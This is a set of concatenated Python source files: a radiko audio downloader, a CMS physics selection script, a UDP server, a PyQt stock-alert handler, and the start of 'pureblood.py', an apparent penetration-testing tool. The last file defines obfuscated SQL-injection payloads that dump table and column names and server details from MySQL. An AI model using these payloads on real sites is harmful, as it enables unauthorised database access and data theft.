'-n -headers "X-Radiko-AuthToken: {}" '
'-i "{}" '
'-vn -acodec copy "{}"'.format(
self.auth_response.authtoken,
self.stream_url,
aac_file
))
subprocess.call(cmd, shell=True)
print('create aac file: {}'.format(aac_file))
return True
except Exception:
return False
@click.command(help='Radipy is CLI radiko Downloader written by python3.')
@click.option('-a', '--area', is_flag=True, help='print station id & name in your area')
@click.option('-ls', is_flag=True, help='print program titles & start time. using with -id option')
@click.option('-dt', type=click.DateTime(), help='print program titles & start time. using with -ls, -id option')
@click.option('-id', type=str, help='set station id')
@click.option('-ft', type=str, help='set start datetime str formated by yyyyMMddHHmm e.g. 201804171830')
@click.option('--clear', is_flag=True, help='clear authkey and player in tmp dir')
def main(area, id, ft, ls, clear, dt):
if clear:
Radipy.clear()
elif area:
radipy = Radipy(0, 0)
radipy.get_channels()
elif id and ft:
radipy = Radipy(station_id=id, ft=ft)
radipy.create()
elif id and ls and dt:
radipy = Radipy(station_id=id, ft=0)
radipy.get_programs(dt=dt)
elif id and ls:
radipy = Radipy(station_id=id, ft=0)
radipy.get_programs()
if __name__ == '__main__':
main()
|
runSelectionSequence.py
|
from __future__ import division, print_function
import ROOT
from PhysicsTools.NanoAODTools.postprocessing.framework.postprocessor import PostProcessor
from PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import Collection, Object
from PhysicsTools.NanoAODTools.postprocessing.framework.eventloop import Module
from PhysicsTools.NanoAODTools.postprocessing.tools import * #DeltaR, match collection methods
from PhysicsTools.NanoAODTools.postprocessing.modules.common.puWeightProducer import *
from FourTopNAOD.Kai.modules.MCTreeDev import TenKTree
from FourTopNAOD.Kai.modules.MCTreePlot import MCTreePlot
from FourTopNAOD.Kai.modules.BaselineSelector import BaselineSelector
from FourTopNAOD.Kai.modules.trigger import Trigger
import collections, copy, json
import multiprocessing
import os, time
Tuples=[]
basefiles=["tree_1.root", "tree_2.root", "tree_3.root", "tree_4.root", "tree_5.root", "tree_6.root"]
preTTTT="/eos/home-n/nmangane/CMSSW/CMSSW_10_2_14/src/FourTopNAOD/Kai/crab/crab_NanoGenTop_TTTTv2/results/"
preTT2L="/eos/home-n/nmangane/CMSSW/CMSSW_10_2_14/src/FourTopNAOD/Kai/crab/crab_NanoGenTop_TTTo2L2Nu/results/"
preTT2LGF="/eos/home-n/nmangane/CMSSW/CMSSW_10_2_14/src/FourTopNAOD/Kai/crab/crab_NanoGenTop_TTTo2L2Nu_GenFilt/results/"
preTT1L="/eos/home-n/nmangane/CMSSW/CMSSW_10_2_14/src/FourTopNAOD/Kai/crab/crab_NanoGenTop_TTToSemiLeptonic/results/"
preTT1LGF="/eos/home-n/nmangane/CMSSW/CMSSW_10_2_14/src/FourTopNAOD/Kai/crab/crab_NanoGenTop_TTToSemiLeptonic_GenFilt/results/"
triggers=["HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ_Mass3p8",
"HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ",
"HLT_Ele23_Ele12_CaloIdL_TrackIdL_IsoVL_DZ",
"HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ",
"HLT_Mu23_TrkIsoVVL_Ele12_CaloIdL_TrackIdL_IsoVL_DZ"
]
hName="SelSeq-TTTT-PU-TRG.root"
fName="SelSeq-TTTT-PU-TRG.root"
files=[preTTTT+file for file in basefiles]
filt=None
Tuples.append((files, hName, fName, filt))
hName="SelSeq-TTTT-SingleLepton-PU-TRG.root"
fName="SelSeq-TTTT-SingleLepton-PU-TRG.root"
files=[preTTTT+file for file in basefiles]
filt=1
Tuples.append((files, hName, fName, filt))
hName="SelSeq-TTTT-DiLepton-PU-TRG.root"
fName="SelSeq-TTTT-DiLepton-PU-TRG.root"
files=[preTTTT+file for file in basefiles]
filt=2
Tuples.append((files, hName, fName, filt))
hName="SelSeq-TTTT-TriLepton-PU-TRG.root"
fName="SelSeq-TTTT-TriLepton-PU-TRG.root"
files=[preTTTT+file for file in basefiles]
filt=3
Tuples.append((files, hName, fName, filt))
hName="SelSeq-TTTo2L2Nu-PU-TRG.root"
fName="SelSeq-TTTo2L2Nu-PU-TRG.root"
files=[preTT2L+file for file in basefiles]
filt=None
Tuples.append((files, hName, fName, filt))
hName="SelSeq-TTTo2L2NuGF-PU-TRG.root"
fName="SelSeq-TTTo2L2NuGF-PU-TRG.root"
files=[preTT2LGF+file for file in basefiles]
filt=None
Tuples.append((files, hName, fName, filt))
hName="SelSeq-TTToSemiLeptonic-PU-TRG.root"
fName="SelSeq-TTToSemiLeptonic-PU-TRG.root"
files=[preTT1L+file for file in basefiles]
filt=None
Tuples.append((files, hName, fName, filt))
hName="SelSeq-TTToSemiLeptonicGF-PU-TRG.root"
fName="SelSeq-TTToSemiLeptonicGF-PU-TRG.root"
files=[preTT1LGF+file for file in basefiles]
filt=None
Tuples.append((files, hName, fName, filt))
def multiplier(fileList, hName=None, fName="def.root", NLeps=None, maxevt=10000):
hName = None
hDirName = None
p=PostProcessor(".",
fileList,
modules=[puWeightProducer("auto",pufile_data2017,"pu_mc","pileup",verbose=True),
Trigger(triggers),
BaselineSelector(isData=True, era="2017", btagging=['DeepCSV','M'], lepPt=25, MET=50, HT=500, invertZWindow=False, GenTop_LepSelection=None),
# MCTreePlot(maxevt=maxevt, filterNLeps=NLeps)
],
haddFileName=fName,
noOut=False,
# histFileName=hName,
# histDirName=hDirName,
)
p.run()
pList = []
nmbr = 0
for tup in Tuples:
if nmbr > 0: continue
nmbr += 1
p = multiprocessing.Process(target=multiplier, args=(tup[0], tup[1], tup[2], tup[3], 10000))
pList.append(p)
p.start()
for p in pList:
p.join()
|
UDP_server_Threaded.py
|
#! /usr/bin/env python
###############################################################################
# UDP_server_Threaded.py
#
# Threaded UDP server
#
# NOTE: Any plotting is set up for output, not viewing on screen.
# So, it will likely be ugly on screen. The saved PDFs should look
# better.
#
# Created: 01/27/16
# - Joshua Vaughan
# - joshua.vaughan@louisiana.edu
# - http://www.ucs.louisiana.edu/~jev9637
#
# Modified:
# *
#
###############################################################################
# Allow use (maybe) in Python 2
from __future__ import print_function
import socket
import threading
import socketserver
import time
# TODO: Fix this nasty global variable hack
data, x_data, y_data = None, None, None
# Send some data to start communication?
SEND_DATA = False
class ThreadedUDPRequestHandler(socketserver.BaseRequestHandler):
"""
The RequestHandler class for our server.
It is instantiated once per connection to the server, and must
override the handle() method to implement communication to the
client.
"""
def handle(self):
global data #x_data, y_data
data = self.request[0].strip()
socket = self.request[1]
string_to_print = "Data from {}: {}".format(self.client_address, data)
print(string_to_print)
# x,sep,y = data.partition(',')
# x_data = float(x)
# y_data = float(y)
# socket.sendto(string_to_print.encode('utf-8'), self.client_address)
# Streaming?... change above to SocketServer.StreamRequestHandler
# def handle(self):
# # self.rfile is a file-like object created by the handler;
# # we can now use e.g. readline() instead of raw recv() calls
# self.data = self.rfile.readline().strip()
# print "{} wrote:".format(self.client_address[0])
# print self.data
# # Likewise, self.wfile is a file-like object used to write back
# # to the client
# self.wfile.write(self.data.upper())
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
pass
if __name__ == '__main__':
# Port 0 means to select an arbitrary unused port
HOST, PORT = '10.0.1.6', 2390
server = ThreadedUDPServer((HOST, PORT), ThreadedUDPRequestHandler)
ip, port = server.server_address
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target = server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
print('Server loop running in thread: {}'.format(server_thread.name))
# we can now count and receive UDP packets at the same time
try:
if SEND_DATA:
UDP_TARGET_IP = '10.0.1.99'
UDP_PORT = 2390
MESSAGE = 'Hello from the Python server'
send_sock = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP
send_sock.sendto(MESSAGE.encode('utf-8'), (UDP_TARGET_IP, UDP_PORT))
while True:
if SEND_DATA:
send_sock.sendto(MESSAGE.encode('utf-8'), (UDP_TARGET_IP, UDP_PORT))
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
print('Waiting for server to shtudown and close...')
server.socket.close()
server.shutdown()
server_thread.join(2) # Wait for the server thread to terminate
server.server_close()
print('Closing...')
|
data_handler.py
|
from config import command_ledger, data_ledger
import time
from PyQt5 import QtWidgets, QtCore, QtGui
from yahoofinancials import YahooFinancials
from dicttoxml import dicttoxml
import xmltodict
from xml.dom.minidom import parseString
import threading
import windows.popups.popup_handler as ph
import datetime as dt
'''
*** command_ledger Documentation:
command_ledger = [{command_type1: [parameter1, parameter2]}, {command_type2: [parameter1, parameter2, parameter3]}]
Format Documentation:
Add new alert:
Type: Price reference/type
{'addAlert': [alertlist, name, symbol, reference, operator, threshold]}
Add new watch:
{'addWatch': [watchlist, name, symbol, reference, operator, threshold]
Add alert list:
{'addList': ['Alert', listname]}
Delete alert list:
{'deleteList': ['Alert', [listname1, listname2, ...]]}
Save lists to file:
{'savetofile': filepath)
Open list from file:
{'openfile': filepath}
Create new list:
{'new': None}
Switch list view:
{'changeList': [listtype, listname]}
Force GUI update:
{'forceGUIUpdate': None}
Format:
self.data_ledger = [{ Header: {Misc. Information} },
{Alertlists:
{ Alertlist1: {Stockname: [{XYZ}, {XYZ}], Stockname: [{XYZ}] },
{ Alertlist2: {Stockname: [{XYZ}], Stockname: [{XYZ}] }},
{Watchlist:
{ Watchlist1: {Stockname: [{ABC}, {ABC}] }}
]
*** self.data_ledger Documentation:
self.data_ledger =
{ Header: {'active': {'activeListtype': listtype,'activeListname': listname}},
Alertlists:
{ AlertlistName:
{ Coca Cola:
{ Symbol: CO,
Alert1: *** TYPE PRICE EXAMPLE ***
{
Reference: Price,
Operator: Over,
Threshold: 53,
Price: 47,
Ratio: 0.987
},
Alert2:
{ XYZ
}
}
}
},
Watchlists:
{ WachtlistName:
{ Palantir:
{ Symbol: PLTR,
Price: 24,
Watch:
{
1d: 24, #1 day
'chg_1d': None,
1w: 32, #5 days
'chg_1w': None,
1m: 17, #30 days
'chg_1m': None,
1y: 7 #360 days
'chg_1y': None
}
}
}
}
}
'''
# TODO Remember Listsort
# noinspection SpellCheckingInspection
class DataHandler():
def __init__(self, root_ui):
#load previous lists or load default self.data_ledger
self.data_ledger = {'Header': {'active': {'activeListtype': None, 'activeListname': None},
'settings': None},
'Alertlists': {},
'Watchlists': {}
}
update_timer = 300
ud_thread = threading.Thread(target=self.update_data, name='Data Updater', args=(update_timer,))
ud_thread.start()
#TODO change on autoload
self.current_file_path = ''
print('DataHandler initialized')
def logic_loop(self, root_ui):
while True:
def process_new_commands():
if command_ledger:
for command in list(command_ledger):
print('Command:', command)
if str(list(command.keys())[0]) == 'addAlert':
if self.data_ledger['Alertlists'][command['addAlert'][0]] is None or command['addAlert'][1] not in self.data_ledger['Alertlists'][command['addAlert'][0]].keys():
self.data_ledger['Alertlists'][command['addAlert'][0]][command['addAlert'][1]] = {}
self.data_ledger['Alertlists'][command['addAlert'][0]][command['addAlert'][1]]['Symbol'] = command['addAlert'][2]
self.data_ledger['Alertlists'][command['addAlert'][0]][command['addAlert'][1]]['Price'] = ' - - - '
new_list_count = sum('Alert' in s for s in list(self.data_ledger['Alertlists'][command['addAlert'][0]][command['addAlert'][1]].keys())) + 1
self.data_ledger['Alertlists'][command['addAlert'][0]][command['addAlert'][1]]['Alert{}'.format(new_list_count)] = \
{
'Reference': command['addAlert'][3],
'Operator': command['addAlert'][4],
'Threshold': command['addAlert'][5],
'Ratio': None,
}
self.update_sleep = False
update_gui()
elif str(list(command.keys())[0]) == 'addWatch':
if self.data_ledger['Watchlists'][command['addWatch'][0]] is None or command['addWatch'][1] not in self.data_ledger['Watchlists'][command['addWatch'][0]].keys():
if self.data_ledger['Watchlists'][command['addWatch'][0]] is None:
self.data_ledger['Watchlists'][command['addWatch'][0]] = {}
self.data_ledger['Watchlists'][command['addWatch'][0]][command['addWatch'][1]] = {}
self.data_ledger['Watchlists'][command['addWatch'][0]][command['addWatch'][1]]['Symbol'] = command['addWatch'][2]
self.data_ledger['Watchlists'][command['addWatch'][0]][command['addWatch'][1]]['Price'] = None
self.data_ledger['Watchlists'][command['addWatch'][0]][command['addWatch'][1]]['Watch'] = \
{
'price_1d': None,
'chg_1d': None,
'price_1w': None,
'chg_1w': None,
'price_1m': None,
'chg_1m': None,
'price_1y': None,
'chg_1y': None
}
#TODO: Add other custom Indicators to track. E.g. SMA, EMA, RSI, high, low
self.update_sleep = False
update_gui()
elif str(list(command.keys())[0]) == 'addList':
# TODO Add watchlists here
if command['addList'][0] == 'Alert':
self.data_ledger['Alertlists'][command['addList'][1].replace(' ', '_')] = {}
if None in self.data_ledger['Header']['active']:
self.data_ledger['Header']['active'] = {'activeListtype': 'Alertlists', 'activeListname': command['addList'][1].replace(' ', '_')}
elif command['addList'][0] == 'Watch':
self.data_ledger['Watchlists'][command['addList'][1].replace(' ', '_')] = {}
if None in self.data_ledger['Header']['active']:
self.data_ledger['Header']['active'] = {'activeListtype': 'Watchlists', 'activeListname': command['addList'][1].replace(' ', '_')}
update_gui()
elif str(list(command.keys())[0]) == 'deleteList':
# TODO Add watchlists here
if command['deleteList'][0] == 'Alert':
for list_to_delete in command['deleteList'][1]:
del self.data_ledger['Alertlists'][list_to_delete.replace(' ', '_')]
if list_to_delete.replace(' ', '_') == self.data_ledger['Header']['active']['activeListname']:
self.data_ledger['Header']['active']['activeListtype'] = 'Alertlists'
self.data_ledger['Header']['active']['activeListname'] = root_ui.listWidget_alertlists.item(0).text().replace(' ', '_')
elif command['deleteList'][0] == 'Watch':
for list_to_delete in command['deleteList'][1]:
del self.data_ledger['Watchlists'][list_to_delete.replace(' ', '_')]
if list_to_delete.replace(' ', '_') == self.data_ledger['Header']['active']['activeListname']:
self.data_ledger['Header']['active']['activeListtype'] = 'Watchlists'
self.data_ledger['Header']['active']['activeListname'] = root_ui.listWidget_watchlists.item(0).text().replace(' ', '_')
update_gui()
elif str(list(command.keys())[0]) == 'save':
if self.current_file_path == '':
ph.popup_triggers('savetofile', root_ui=root_ui)
else:
save_file_dict = parseString(dicttoxml(self.data_ledger, attr_type=False))
f = open(self.current_file_path, 'w', encoding='utf-8')
f.write(save_file_dict.toprettyxml())
f.close()
elif str(list(command.keys())[0]) == 'savetofile':
if not command['savetofile'] == '':
self.current_file_path = command['savetofile']
save_file_dict = parseString(dicttoxml(self.data_ledger, attr_type=False))
f = open(command['savetofile'], 'w', encoding='utf-8')
f.write(save_file_dict.toprettyxml())
f.close()
elif str(list(command.keys())[0]) == 'openfile':
if not command['openfile'] == '':
self.current_file_path = command['openfile']
f = open(command['openfile'], 'r', encoding='utf-8')
self.data_ledger = dict(xmltodict.parse(f.read(), process_namespaces=False, dict_constructor=dict))['root']
f.close()
if self.data_ledger['Alertlists'] == None:
self.data_ledger['Alertslists'] = {}
if self.data_ledger['Watchlists'] == None:
self.data_ledger['Watchlists'] = {}
self.update_sleep = False
update_gui()
elif str(list(command.keys())[0]) == 'new':
self.current_file_path = None
self.data_ledger = {'Header': {'active': {'activeListtype': None, 'activeListname': None}},
'Alertlists': {},
'Watchlists': {}
}
update_gui()
elif str(list(command.keys())[0]) == 'changeList':
self.data_ledger['Header']['active'] = {'activeListtype': command['changeList'][0], 'activeListname': (command['changeList'][1].text().replace(' ', '_'))}
update_gui()
elif str(list(command.keys())[0]) == 'forceGUIUpdate':
update_gui()
command_ledger.remove(command)
process_new_commands()
def update_gui():
#TODO Color or bold active list in listwidget
print('Updating Gui')
root_ui.listWidget_alertlists.clear()
root_ui.listWidget_watchlists.clear()
if self.data_ledger['Alertlists'] is not None:
[root_ui.listWidget_alertlists.addItem(listname.replace('_', ' ')) for listname in self.data_ledger['Alertlists'].keys()]
#[root_ui.listWidget_alertlists.item(i).setTextAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter) for i in range(root_ui.listWidget_alertlists.count())]
if self.data_ledger['Watchlists'] is not None:
[root_ui.listWidget_watchlists.addItem(listname.replace('_', ' ')) for listname in self.data_ledger['Watchlists'].keys()]
#[root_ui.listWidget_watchlists.item(i).setTextAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter) for i in range(root_ui.listWidget_watchlists.count())]
if self.data_ledger['Header']['active']['activeListtype'] == 'Alertlists':
columns = ['Stock', 'Condition', 'Price', 'Ratio']
root_ui.tableWidget_listDisplay.setColumnCount(len(columns))
for i in range(len(columns)):
item = QtWidgets.QTableWidgetItem()
font = QtGui.QFont()
font.setFamily("Roboto")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
item.setFont(font)
root_ui.tableWidget_listDisplay.setHorizontalHeaderItem(i, item)
root_ui.tableWidget_listDisplay.setHorizontalHeaderLabels(columns)
elif self.data_ledger['Header']['active']['activeListtype'] == 'Watchlists':
columns = ['Stock', 'Price', '1d', '1w', '1m', '1y']
root_ui.tableWidget_listDisplay.setColumnCount(len(columns))
for i in range(len(columns)):
item = QtWidgets.QTableWidgetItem()
font = QtGui.QFont()
font.setFamily("Roboto")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
item.setFont(font)
root_ui.tableWidget_listDisplay.setHorizontalHeaderItem(i, item)
root_ui.tableWidget_listDisplay.setHorizontalHeaderLabels(columns)
rowcount = 0
table_insert = []
last_stock = None
if self.data_ledger['Header']['active']['activeListtype'] is not None and self.data_ledger['Header']['active']['activeListname'] in self.data_ledger[self.data_ledger['Header']['active']['activeListtype']].keys():
if self.data_ledger[self.data_ledger['Header']['active']['activeListtype']][self.data_ledger['Header']['active']['activeListname']] is not None:
for stock in self.data_ledger[self.data_ledger['Header']['active']['activeListtype']][self.data_ledger['Header']['active']['activeListname']]:
for object in self.data_ledger[self.data_ledger['Header']['active']['activeListtype']][self.data_ledger['Header']['active']['activeListname']][stock].keys():
if 'Alert' in object: #TODO And Reference == Price, for other types
rowcount += 1
alert_info = self.data_ledger[self.data_ledger['Header']['active']['activeListtype']][self.data_ledger['Header']['active']['activeListname']][stock][object]
price = self.data_ledger[self.data_ledger['Header']['active']['activeListtype']][self.data_ledger['Header']['active']['activeListname']][stock]['Price']
condition = '{} {}'.format(alert_info['Operator'], alert_info['Threshold'])
table_insert.append([stock.replace('_', ' ') if stock != last_stock else '', condition, price, alert_info['Ratio']])
last_stock = stock
if object == 'Watch':
rowcount += 1
watch_info = self.data_ledger[self.data_ledger['Header']['active']['activeListtype']][self.data_ledger['Header']['active']['activeListname']][stock][object]
price = self.data_ledger[self.data_ledger['Header']['active']['activeListtype']][self.data_ledger['Header']['active']['activeListname']][stock]['Price']
table_insert.append([stock.replace('_', ' '), price,
'{} ({}%)'.format(watch_info['price_1d'], watch_info['chg_1d']) if watch_info['chg_1d'] is not None else ' - - - ',
'{} ({}%)'.format(watch_info['price_1w'], watch_info['chg_1w']) if watch_info['chg_1w'] is not None else ' - - - ',
'{} ({}%)'.format(watch_info['price_1m'], watch_info['chg_1m']) if watch_info['chg_1m'] is not None else ' - - - ',
'{} ({}%)'.format(watch_info['price_1y'], watch_info['chg_1y']) if watch_info['chg_1y'] is not None else ' - - - '])
root_ui.tableWidget_listDisplay.setRowCount(rowcount)
for row in range(rowcount):
for column in range(root_ui.tableWidget_listDisplay.columnCount()):
root_ui.tableWidget_listDisplay.setItem(row, column, QtWidgets.QTableWidgetItem(str(table_insert[row][column])))
if self.data_ledger['Header']['active']['activeListtype'] == 'Alertlists':
if column in [0, 1]:
root_ui.tableWidget_listDisplay.item(row, column).setTextAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter)
elif column in [2, 3]:
root_ui.tableWidget_listDisplay.item(row, column).setTextAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
if row % 2 == 0:
root_ui.tableWidget_listDisplay.item(row, column).setBackground(QtGui.QColor(81, 81, 81))
font_size = 12
elif self.data_ledger['Header']['active']['activeListtype'] == 'Watchlists':
if column == 0:
root_ui.tableWidget_listDisplay.item(row, column).setTextAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter)
font_size = 12
elif column in [1, 2, 3, 4, 5]:
root_ui.tableWidget_listDisplay.item(row, column).setTextAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
font_size = 10
if row % 2 == 0:
root_ui.tableWidget_listDisplay.item(row, column).setBackground(QtGui.QColor(81, 81, 81))
font = QtGui.QFont()
font.setFamily('Roboto')
font.setPointSize(font_size)
font.setWeight(75)
root_ui.tableWidget_listDisplay.item(row, column).setFont(font)
root_ui.tableWidget_listDisplay.item(row, column).setForeground(QtGui.QColor(234, 230, 228))
name_column_width = 250
rest_size = (root_ui.tableWidget_listDisplay.frameGeometry().width() - name_column_width) / (len(columns) - 1)
for i in range(len(columns)):
if i == 0:
root_ui.tableWidget_listDisplay.horizontalHeader().resizeSection(i, name_column_width)
root_ui.tableWidget_listDisplay.horizontalHeader().setSectionResizeMode(i, QtWidgets.QHeaderView.Fixed)
else:
root_ui.tableWidget_listDisplay.horizontalHeader().resizeSection(i, rest_size)
root_ui.tableWidget_listDisplay.update()
else:
rowcount = 0
root_ui.tableWidget_listDisplay.setRowCount(rowcount)
root_ui.tableWidget_listDisplay.setGeometry(QtCore.QRect(190, 70, 820, 30 + (rowcount * 30)))
print('Updating Gui finished')
time.sleep(0.2)
#print('Ledger: ', self.data_ledger)
def update_data(self, update_timer):
time.sleep(10)
while True:
try:
print(self.data_ledger)
for typegroup in self.data_ledger.keys():
if typegroup != 'Header':
if self.data_ledger[typegroup] not in [None, '']:
for list_name in self.data_ledger[typegroup].keys():
if self.data_ledger[typegroup][list_name] is not None:
for stock_name in self.data_ledger[typegroup][list_name].keys():
# print('Typegroup: ', typegroup)
# print('Listname: ', list_name)
# print('Stockname: ', stock_name)
symbol = self.data_ledger[typegroup][list_name][stock_name]['Symbol']
for object in self.data_ledger[typegroup][list_name][stock_name].keys():
# TODO Add price update for other alerttypes and watchlist here
if 'Alert' in object:
if self.data_ledger[typegroup][list_name][stock_name][object]['Reference'] == 'Price':
stock_data = YahooFinancials(symbol)
self.data_ledger[typegroup][list_name][stock_name]['Price'] = stock_data.get_stock_price_data(reformat=True)[symbol]['regularMarketPrice']
self.data_ledger[typegroup][list_name][stock_name][object]['Ratio'] = \
'{}%'.format(round(float(self.data_ledger[typegroup][list_name][stock_name]['Price']) / float(self.data_ledger[typegroup][list_name][stock_name][object]['Threshold']) * 100, 2))
elif 'Watch' in object:
date_1d = dt.datetime.today().date() - dt.timedelta(days=1)
date_1w = dt.datetime.today().date() - dt.timedelta(days=5)
date_1m = dt.datetime.today().date() - dt.timedelta(days=30)
date_1y = dt.datetime.today().date() - dt.timedelta(days=360)
stock_data = YahooFinancials(symbol)
self.data_ledger[typegroup][list_name][stock_name]['Price'] = round(stock_data.get_stock_price_data(reformat=True)[symbol]['regularMarketPrice'], 2)
hpd = stock_data.get_historical_price_data('2020-01-01', dt.datetime.today().date().strftime('%Y-%m-%d'), 'daily')[symbol]['prices']
updated_1d = False
updated_1w = False
updated_1m = False
updated_1y = False
for day in reversed(hpd):
if day['formatted_date'] <= date_1d.strftime('%Y-%m-%d') and not updated_1d:
self.data_ledger[typegroup][list_name][stock_name]['Watch']['price_1d'] = round(day['close'], 2)
updated_1d = True
elif day['formatted_date'] <= date_1w.strftime('%Y-%m-%d') and not updated_1w:
self.data_ledger[typegroup][list_name][stock_name]['Watch']['price_1w'] = round(day['close'], 2)
updated_1w = True
elif day['formatted_date'] <= date_1m.strftime('%Y-%m-%d') and not updated_1m:
self.data_ledger[typegroup][list_name][stock_name]['Watch']['price_1m'] = round(day['close'], 2)
updated_1m = True
elif day['formatted_date'] <= date_1y.strftime('%Y-%m-%d') and not updated_1y:
self.data_ledger[typegroup][list_name][stock_name]['Watch']['price_1y'] = round(day['close'], 2)
updated_1y = True
for timeframe in [['price_1d', 'chg_1d'], ['price_1w', 'chg_1w'], ['price_1m', 'chg_1m'], ['price_1y', 'chg_1y']]:
if self.data_ledger[typegroup][list_name][stock_name]['Watch'][timeframe[0]] is not None:
self.data_ledger[typegroup][list_name][stock_name]['Watch'][timeframe[1]] = \
round((self.data_ledger[typegroup][list_name][stock_name]['Price'] / self.data_ledger[typegroup][list_name][stock_name]['Watch'][timeframe[0]] - 1) * 100, 2)
else:
self.data_ledger[typegroup][list_name][stock_name]['Watch'][timeframe[1]] = None
command_ledger.append({'forceGUIUpdate': None})
except RuntimeError:
continue
except KeyError:
break
self.update_sleep = True
while self.update_sleep:
for i in range(update_timer):
if self.update_sleep:
time.sleep(1)
self.update_sleep = False
|
pureblood.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Script Created By:
Cr4sHCoD3
Github:
https://github.com/cr4shcod3
FB Page:
https://facebook.com/cr4shcod3.py
Youtube:
https://www.youtube.com/channel/UCEw5DaWEUY0XeUOTl1U2LKw
Buy Me A Coffee:
https://www.buymeacoffee.com/f4a5kJcyl
Google Plus:
https://plus.google.com/u/0/115239095310355713855
Copyrights:
Cr4sHCoD3 2018
MIT LICENSE
Special Mentions:
PureHackers PH
Blood Security Hackers
"""
import os
import sys
import platform
import time
import datetime
import re
import threading
import socket
import webbrowser
import hashlib
import random
import subprocess
import zipfile
try:
import colorama
colorama.init()
except:
print ('[!] - Module (colorama) not installed!')
sys.exit()
try:
import requests
from requests.exceptions import ConnectionError
except:
print ('[!] - Module (requests) not installed!')
sys.exit()
try:
import whois
except:
print ('[!] - Module (python-whois) not installed!')
sys.exit()
try:
import dns.resolver
except:
print ('[!] - Module (dnspython) not installed!')
sys.exit()
try:
from bs4 import BeautifulSoup
except:
print ('[!] - Module (bs4) not installed!')
sys.exit()
try:
import shodan
except:
print ('[!] - Module (shodan) not installed!')
sys.exit()
#########################################################################################################################################################
# GLOBAL
FNULL = open(os.devnull, 'w')
google_hacking = 'https://www.google.com/search?q='
dios1 = '(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(InFoRMAtiON_sCHeMa.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c7374726f6e672069643d2250757265426c6f6f64223e5461626c653a20,TaBLe_nAMe,0x203d3d20,column_name,0x3c2f7374726f6e673e3c62723e))))a)'
sqli_payload_hostname = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@hostname,0x3c2f7374726f6e673e)'
sqli_payload_tmpdir = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@tmpdir,0x3c2f7374726f6e673e)'
sqli_payload_datadir = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@datadir,0x3c2f7374726f6e673e)'
sqli_payload_version = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@version,0x3c2f7374726f6e673e)'
sqli_payload_basedir = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@basedir,0x3c2f7374726f6e673e)'
sqli_payload_user = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,user(),0x3c2f7374726f6e673e)'
sqli_payload_database = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,database(),0x3c2f7374726f6e673e)'
sqli_payload_schema = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,schema(),0x3c2f7374726f6e673e)'
sqli_payload_uuid = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,UUID(),0x3c2f7374726f6e673e)'
sqli_payload_system_user = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,system_user(),0x3c2f7374726f6e673e)'
sqli_payload_session_user = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,session_user(),0x3c2f7374726f6e673e)'
sqli_payload_symlink = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@GLOBAL.have_symlink,0x3c2f7374726f6e673e)'
sqli_payload_ssl = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@GLOBAL.have_ssl,0x3c2f7374726f6e673e)'
sqli_dump_column_payload = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,<column>,0x3c2f7374726f6e673e)'
## Color
reset = '\033[0m'
bold = '\033[1m'
underline = '\033[4m'
### Fore
black = '\033[90m'; red = '\033[91m'; green = '\033[92m'; yellow = '\033[93m'; blue = '\033[94m'; magenta = '\033[95m'; cyan = '\033[96m'; white = '\033[97m'
### Background
bg_black = '\033[90m'; bg_red = '\033[91m'; bg_green = '\033[92m'; bg_yellow = '\033[93m'; bg_blue = '\033[94m'; bg_magenta = '\033[95m'; bg_cyan = '\033[96m'; bg_white = '\033[97m'
## Configuration
if platform.system() == 'Windows':
from ctypes import windll, create_string_buffer
h = windll.kernel32.GetStdHandle(-12)
csbi = create_string_buffer(22)
res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
if res:
import struct
(bufx, bufy, curx, cury, wattr,
left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
sizex = right - left + 1
sizey = bottom - top + 1
else:
sizex, sizey = 80, 25
elif platform.system() == 'Linux' or platform.system() == 'Darwin':
sizey, sizex = os.popen('stty size', 'r').read().split()
else:
sizex = 50
## Date Time
month = datetime.date.today().strftime("%B")
if datetime.date.today().strftime("%w") == 1 or datetime.date.today().strftime("%w") == '1':
day = 'Monday'
elif datetime.date.today().strftime("%w") == 2 or datetime.date.today().strftime("%w") == '2':
day = 'Tuesay'
